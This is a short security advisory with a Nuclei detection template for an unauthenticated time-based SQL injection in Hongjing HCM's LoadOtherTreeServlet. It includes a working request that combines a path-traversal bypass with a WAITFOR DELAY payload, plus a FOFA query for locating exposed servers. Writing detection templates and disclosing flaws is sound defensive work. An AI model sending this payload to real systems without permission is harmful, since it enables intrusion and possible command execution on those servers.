There is a SQL injection vulnerability in the /gz/LoadOtherTreeServlet interface of Hongjing HCM. Unauthenticated remote attackers can use the SQL injection vulnerability with the database xp_cmdshell to execute arbitrary commands and control the server. After analysis and judgment, the vulnerability is easy to exploit and it is recommended to be fixed as soon as possible.
PoC代码[已公开]
id: hjsoft-hcm-tb-sqli
info:
name: Hongjing HCM - Time-Based Sql Injection
author: s4e-io
severity: high
description: |
There is a SQL injection vulnerability in the /gz/LoadOtherTreeServlet interface of Hongjing HCM. Unauthenticated remote attackers can use the SQL injection vulnerability with the database xp_cmdshell to execute arbitrary commands and control the server. After analysis and judgment, the vulnerability is easy to exploit and it is recommended to be fixed as soon as possible.
reference:
- https://github.com/wy876/POC/blob/main/%E5%AE%8F%E6%99%AFeHR%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3LoadOtherTreeServlet%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: app="HJSOFT-HCM"
tags: time-based-sqli,sqli,hjsoft,management-system,vuln
http:
- raw:
- |
@timeout: 20s
GET /w_selfservice/oauthservlet/%2e./.%2e/gz/LoadOtherTreeServlet?modelflag=4&budget_id=1%29%3BWAITFOR+DELAY+%270%3A0%3A6%27--&flag=1 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "duration>=6"
- 'contains_all(body,"TreeNode","tab_id")'
- 'contains(header,"text/xml")'
- "status_code == 200"
condition: and
# digest: 490a0046304402207b91f0a89ac3575d282f0b0dcbf6db0237341056b51bcf3a303052b079023c69022079d813ba6176549bbb873bb5c6b2ae57f5cb1c187c8e1c2f6ba56d802b9329e5:922c64590222798bb761d5b6d8e72950